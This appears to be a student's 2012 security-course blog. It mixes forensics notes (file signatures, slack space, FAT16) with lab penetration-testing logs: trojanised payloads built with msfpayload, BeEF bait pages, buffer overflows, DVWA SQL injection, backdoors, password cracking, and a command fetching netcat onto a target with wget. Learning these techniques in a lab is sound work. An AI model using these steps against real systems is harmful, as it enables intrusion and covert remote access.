Sunday, 18 March 2012

Magic Number

The term magic number has multiple meanings. It can refer to one or more of the following:
  • A constant numerical or text value used to identify a file format or protocol; for files, see List of file signatures
  • Distinctive unique values that are unlikely to be mistaken for other meanings (e.g., Globally Unique Identifiers)
  • Unique values with unexplained meaning or multiple occurrences which could (preferably) be replaced with named constants

File Type

I will try to discuss the CDR file type. What is CDR? CDR is the file type of Corel Draw: if we draw in Corel Draw, the saved file has the CDR extension.
Detailed information for the CDR file extension:
primary association: Corel
company: Corel Corporation
file classification: Graphic
mime types: application/cdr, application/coreldraw, application/x-cdr, application/x-coreldraw, picture/cdr, image/x-cdr, zz-application/zz-winassoc-cdr
identifying hex characters: 52 49 46 46, ASCII: RIFF
program IDs: CDraw4, CorelDRAW.Graphic.8, CorelDRAW.Graphic.9, CorelDRAW.Graphic.10, CorelDRAW.Graphic.11
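As an added example (not part of the original post), a small Python check of the RIFF magic number described above. It reads both the 52 49 46 46 signature and the form type at offset 8, because "RIFF" alone is shared by WAV, AVI, WebP and CDR files; the "CDR" plus version-character form type and all sample headers are assumptions constructed here.

```python
import struct

# Well-known RIFF form types (bytes 8-12). The "CDR" + version character form
# used by CorelDRAW is an assumption, as is every sample header below.
RIFF_FORM_TYPES = {b"WAVE": "WAV audio", b"AVI ": "AVI video", b"WEBP": "WebP image"}


def identify_riff(data: bytes) -> dict:
    """Inspect the first 12 bytes of a RIFF container.

    The magic number 52 49 46 46 ("RIFF") only says "RIFF container"; the
    form type at offset 8 tells CDR apart from WAV, AVI, WebP and others, so
    a file-type check must read both fields, not just the first four bytes.
    """
    if len(data) < 12 or data[:4] != b"RIFF":
        return {"is_riff": False}
    declared = struct.unpack("<I", data[4:8])[0]  # little-endian byte count after this field
    form = data[8:12]
    if form[:3] == b"CDR":
        kind = "CorelDRAW CDR (version tag %r)" % form[3:4]
    else:
        kind = RIFF_FORM_TYPES.get(form, "unknown RIFF form %r" % form)
    # A declared size that does not match the data is typical of truncated,
    # carved or deliberately malformed files; report it rather than trust it.
    return {"is_riff": True, "form": form, "kind": kind,
            "declared_size": declared, "size_matches": declared == len(data) - 8}


def riff_header(form: bytes, payload: bytes) -> bytes:
    """Build a constructed RIFF file image for testing (not a real file)."""
    return b"RIFF" + struct.pack("<I", len(form) + len(payload)) + form + payload


SAMPLE_CDR = riff_header(b"CDR9", b"vrsnXXXX")          # constructed
SAMPLE_WAV = riff_header(b"WAVE", b"fmt \x10\x00\x00\x00")  # constructed
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 8           # not RIFF at all
```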

Unallocated Space

Unallocated space is available disk space that is not allocated to any volume. The type of volume that you can create on unallocated space depends on the disk type. On basic disks, you can use unallocated space to create primary or extended partitions. On dynamic disks, you can use unallocated space to create dynamic volumes.

Slack Space

Slack space, sometimes referred to as file slack, is the area between the end of a file and the end of the last cluster or sector used by that file. This area will not be used again to store information, so it is "wasted". Slack space is common in file systems that use a large cluster size, while a file system that uses a small cluster size can organize the storage medium more effectively and efficiently. The amount of wasted disk space can be estimated by multiplying the number of files (including the number of directories) by half the size of a cluster. For example, a personal computer that stores 10 000 files in a file system that uses a cluster size of 4 kilobytes will have approximately 10 000 x 2 KB ~= 20000 KB of slack. On a large file server, slack space can reach tens of gigabytes.
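As an added example (not from the original post), the slack computation above in Python: exact per-file slack for a given cluster size next to the files-times-half-a-cluster estimate, run over constructed file sizes for two cluster sizes to show the smaller-cluster claim.

```python
def file_slack(file_size: int, cluster_size: int) -> int:
    """Bytes between the end of the file's data and the end of its last cluster."""
    if cluster_size <= 0 or file_size < 0:
        raise ValueError("cluster size must be positive and file size non-negative")
    if file_size == 0:
        return 0  # assumption: an empty file has no cluster allocated to it
    return (-file_size) % cluster_size


def slack_report(file_sizes, cluster_size: int) -> dict:
    """Exact slack per file and in total, beside the rule-of-thumb estimate
    from the text (number of files times half a cluster)."""
    per_file = [file_slack(s, cluster_size) for s in file_sizes]
    return {
        "cluster_size": cluster_size,
        "per_file": per_file,
        "total": sum(per_file),
        "estimate": len(file_sizes) * cluster_size // 2,
    }


# Constructed file sizes in bytes (not measured on any real disk).
SAMPLE_SIZES = [1, 4096, 5000, 12345, 100_000]


def compare_cluster_sizes(file_sizes=SAMPLE_SIZES, cluster_sizes=(512, 4096)):
    """The same files waste less space on smaller clusters; returns one report per cluster size."""
    return [slack_report(file_sizes, c) for c in cluster_sizes]


if __name__ == "__main__":
    for report in compare_cluster_sizes():
        print(report)
```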

Thursday, 15 March 2012

Filesystem Structure

FAT16
A file system that uses allocation units addressed with at most 16 bits, so it can track up to 2^16 allocation units (65536). This file system has a capacity limit of only 4 gigabytes. The allocation unit size used by a FAT16 partition depends on the capacity of the partition about to be formatted: if the partition size is less than 16 megabytes, Windows will use the FAT12 file system, and if the partition is larger than 16 megabytes, Windows will use the FAT16 file system. The following table contains information on which operating systems support the FAT16 file system.

MBR (Master Boot Record)

The master boot record (MBR) is a type of boot sector popularized by the IBM Personal Computer. It consists of a sequence of 512 bytes located at the first sector of a data storage device such as a hard disk. MBRs are usually placed on storage devices intended for use with IBM PC-compatible systems.
The MBR may be used for one or more of the following:

Sunday, 04 March 2012

MSFPAYLOAD and MSFENCODE, example of use

msfpayload and msfencode are used to make a fake application that we transfer to the victim computer; when the victim computer opens the application, it connects directly to the attacker's computer. But the attacker's computer must be in a listening (ready) position.

Example of using msfpayload and msfencode


In the picture I make a fake notepad.exe, which is the file that will be sent to the victim computer.

Wednesday, 29 February 2012

Combine Browser and Metasploit

This time, I try to combine the browser and Metasploit to exploit the victim.
Using BeEF, copy the JavaScript into a web page that we put up as bait for the victim computer, so that the victim computer can be connected to our computer.


Monday, 27 February 2012

File exploit and Web exploit

The first computer I had to exploit was the first victim: do information gathering and then exploit it


with a file exploit


Auxiliary modules using Metasploit

Search the auxiliary modules with the command show auxiliary at msfconsole


After that, choose one auxiliary module and, to know which settings it uses, run the command show options


After that, set RHOST and RPORT


and exploit


Social Engineering

Social engineering is the acquisition of secret or sensitive information, or of access, by deceiving the owner of that information. Social engineering is typically done via telephone or the Internet. Social engineering is one of the methods used by hackers to gain information about the target, by requesting the information directly from the victim or from others who have that information.

Social engineering concentrates on the weakest link in computer network systems, namely humans. As we know, there is no computer system that does not involve human interaction. Worse, this vulnerability is universal, independent of platform, operating system, protocol, software or hardware: every system has the same weakness in the human factor. Any person who has physical access to the system is a threat, even if that person is not covered by the security policy that has been developed. Like other methods such as hacking, social engineering also requires preparation; in fact most of the work is the preparation itself.

MSFPAYLOAD

Friday, 17 February 2012

Buffer Overflow BigAnt SEH

What is BigAnt?
BigAnt is an instant messenger that features 128-bit encrypted messages and file sending, a clearly structured on-line list of users, and ease of use. BigAnt is used on client computers together with a server computer.


Sunday, 12 February 2012

Buffer Overflow RM-MP3 Converter

This time, I try to exploit RM-MP3 Converter with the buffer overflow method.
Prepare the file which will be used as the tool for the buffer overflow.


Sunday, 05 February 2012

Saturday, 04 February 2012

OllyDbg and Installation

OllyDbg is an x86 debugger that emphasizes binary code analysis, which is useful when source code is not available. It traces registers, recognizes procedures, API calls, switches, tables, constants and strings, as well as locates routines from object files and libraries.
OllyDbg is often used for reverse engineering of programs. It is often used by crackers to crack software made by other developers. For cracking and reverse engineering, it is often the primary tool because of its ease of use and availability. It is also useful for programmers to ensure that their program is running as intended.

Friday, 03 February 2012

Fuzzer and Fuzzing

A fuzzer is the name for the application used in the fuzzing process. Fuzzing is a process or method used to find logic errors and failures in data-processing applications by providing abnormal input to the application, observing what it does with it, and learning how it handles the exceptions that result.
A fuzzer basically works by sending data continuously and repeatedly, either automatically or semi-automatically, into a piece of software for processing. The input data is usually not normal but specially crafted, for example using special characters or having an abnormal amount or length of data.
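As an added example (not the post's own code), a small mutation fuzzer in Python run against a deliberately naive RIFF-style chunk reader, beside a version with the checks the fuzzer shows are missing. The seed input, the three mutation strategies and the "declared length" oracle are assumptions made here.

```python
import random
import struct

# Constructed seed input: 4-byte tag, 4-byte little-endian length, payload.
SEED = b"RIFF" + struct.pack("<I", 4) + b"WAVE"


def read_chunk_naive(data: bytes) -> bytes:
    """Trusting parser: believes the length field without checking it."""
    size = struct.unpack_from("<I", data, 4)[0]
    return data[8:8 + size]


def read_chunk_safe(data: bytes) -> bytes:
    """Same parser with the checks the fuzzer shows are missing."""
    if len(data) < 8:
        raise ValueError("header too short")
    size = struct.unpack_from("<I", data, 4)[0]
    if size > len(data) - 8:
        raise ValueError("declared length exceeds available data")
    return data[8:8 + size]


def mutate(rng: random.Random, data: bytes) -> bytes:
    """One abnormal input: truncation, a single bit flip, or an extreme length field."""
    choice = rng.randrange(3)
    if choice == 0:
        return data[:rng.randrange(len(data))]
    if choice == 1:
        i = rng.randrange(len(data))
        return data[:i] + bytes([data[i] ^ (1 << rng.randrange(8))]) + data[i + 1:]
    return data[:4] + struct.pack("<I", rng.choice([0, 0xFFFFFFFF, 2**31])) + data[8:]


def fuzz(target, cases: int = 500, seed: int = 1) -> dict:
    """Feed mutated inputs to target; return {finding name: first input that triggered it}.

    ValueError is the parser's own deliberate rejection, so it is not a finding.
    A silently short result is caught with an oracle, since no exception is raised.
    """
    rng = random.Random(seed)  # fixed seed makes a run reproducible
    findings = {}
    for _ in range(cases):
        case = mutate(rng, SEED)
        try:
            result = target(case)
        except ValueError:
            continue
        except Exception as exc:
            findings.setdefault(type(exc).__name__, case)
            continue
        if len(result) != struct.unpack_from("<I", case, 4)[0]:
            findings.setdefault("SilentShortRead", case)
    return findings
```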

Register Memory

Register memory is very small in size but has very high-speed access. Registers are used to hold the data and instructions currently being processed, while other data and instructions waiting to be processed are in main memory.

Wednesday, 01 February 2012

Assignment 8

download

Bypass FBIP

Open FBIP at "localhost/fbip"


MKFIFO

The function "mkfifo" can be used to create a named pipe from within a program. The signature of the function is as follows:
int mkfifo(const char *path, mode_t mode)
The mkfifo function takes the path of the file and the mode (permissions) with which the file should be created. It creates the new named pipe file as specified by the path.
The function call assumes the O_CREAT|O_EXCL flags, that is, it creates a new named pipe or returns an error of EEXIST if the named pipe already exists. The named pipe's owner ID is set to the process's effective user ID, and its group ID is set to the process's effective group ID, or, if the S_ISGID bit is set in the parent directory, the group ID of the named pipe is inherited from the parent directory.
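As an added example (not part of the post), the same create-or-fail behaviour from Python using os.mkfifo, which wraps mkfifo(3): the EEXIST case is turned into a check that the existing object really is a FIFO, and the owner and permission bits are read back. The mode 0o600 and the temporary paths are choices made here.

```python
import os
import stat
import tempfile


def create_named_pipe(path: str, mode: int = 0o600) -> bool:
    """Create a FIFO at path with mkfifo semantics (O_CREAT|O_EXCL).

    Returns True if a new FIFO was created and False if a FIFO was already
    there (the EEXIST case). Anything else at that path, such as a regular
    file or a symlink placed by another user, is refused, because a program
    that then open()s the path would be talking to the wrong object.
    """
    try:
        os.mkfifo(path, mode)  # never overwrites an existing path
        return True
    except FileExistsError:
        if stat.S_ISFIFO(os.lstat(path).st_mode):
            return False
        raise RuntimeError(f"{path} exists but is not a FIFO")


def fifo_permissions(path: str) -> int:
    """Permission bits actually set (the requested mode is masked by umask)."""
    return stat.S_IMODE(os.lstat(path).st_mode)


def demo() -> dict:
    """Run the helpers in a temporary directory and report what happened."""
    with tempfile.TemporaryDirectory() as d:
        fifo = os.path.join(d, "pipe")
        created = create_named_pipe(fifo)
        created_again = create_named_pipe(fifo)  # EEXIST path: FIFO already there
        perms = fifo_permissions(fifo)
        owner_is_caller = os.lstat(fifo).st_uid == os.geteuid()
        regular = os.path.join(d, "not-a-pipe")
        open(regular, "w").close()
        try:
            create_named_pipe(regular)
            refused = False
        except RuntimeError:
            refused = True
    return {"created": created, "created_again": created_again, "perms": perms,
            "owner_is_caller": owner_is_caller, "refused_non_fifo": refused}


if __name__ == "__main__":
    print(demo())
```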

Maltego


Maltego is a platform that gives information about what we want to know about a target, whether that target is infrastructure or a persona.

Maltego is a program that can be used to determine the relationships and real world links between:
  • People
  • Groups of people (social networks)
  • Companies
  • Organizations
  • Web sites
  • Internet infrastructure such as:

About Shodanhq

Shodan is a search engine that lets you find specific computers (routers, servers, etc.) using a variety of filters. Some have also described it as a public port scan directory or a search engine of banners.
Shodan also lets you use boolean operators (‘+’, ‘-’ and ‘|’) to include/exclude certain terms. By default, every search term has a ‘+’ operator assigned to it.
In addition to boolean operators, there are special filters to narrow down the search results.

Exploiting DVWA with SQL Injection

First, set the DVWA security level to low


Then choose SQL Injection and try entering a user id such as '1' and submit; an error will be displayed

NC Revision

Here I am making a correction about NC.
Place the nc file in the www folder


Download it on the target system with the command "wget <host ip>/nc"


Monday, 30 January 2012

Cymothoa

I try to use cymothoa.
Enter the cymothoa directory: write "cd /pentest/backdoors/cymothoa/"


Crack shadow with John the Ripper

To crack with John, find the password file location with the command "./john -i pass (press tab)"


and then run it on the file with the command "./john -i pass3.txt", which will display


and the error result

Privilege Escalation

At this time, I try to crack the host with IP address 192.168.0.21. Before cracking it we must gather information, and from that information we find the loopholes for cracking.
Here I use Nessus to find the target information



Friday, 27 January 2012

ExploitDb

ExploitDB is used on the local host; open ExploitDB



Search for vulnerabilities with Nessus

To find the target's vulnerabilities with Nessus, open Nessus and click scan --> add; a display like the one below will appear. Fill in the fields and click launch scan


Metasploit Windows in Backtrack 5

At this time I discuss Metasploit for Windows

1. We scan for IP addresses connected to our computer; for detection I used nmap to search for IP addresses. With nmap, write "nmap 192.168.56.0/24", and then we get the IP address to attack; here the IP is 192.168.56.10


Wednesday, 25 January 2012

Information Gathering


In the second meeting, I studied Information Gathering. I tried to search for information in the network 192.168.0.0, and this is the result

Computer with address 192.168.0.21
Nmap scan report for 192.168.0.21
Host is up (0.00076s latency).
Not shown: 995 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
10000/tcp open  snet-sensor-mgmt
MAC Address: 08:00:27:F9:C1:BB (Cadmus Computer Systems)

Monday, 23 January 2012

Install VirtualBox

For friends who don’t know how to install Windows and Ubuntu in VirtualBox on Backtrack, I will show you the tutorial.

How to install Windows in VirtualBox
  1. Click the application launcher menu in the lower-left corner of the Desktop, choose System, then click Oracle VM VirtualBox (Virtual Machine); a display like the one below will appear, so click the New button, and click Next: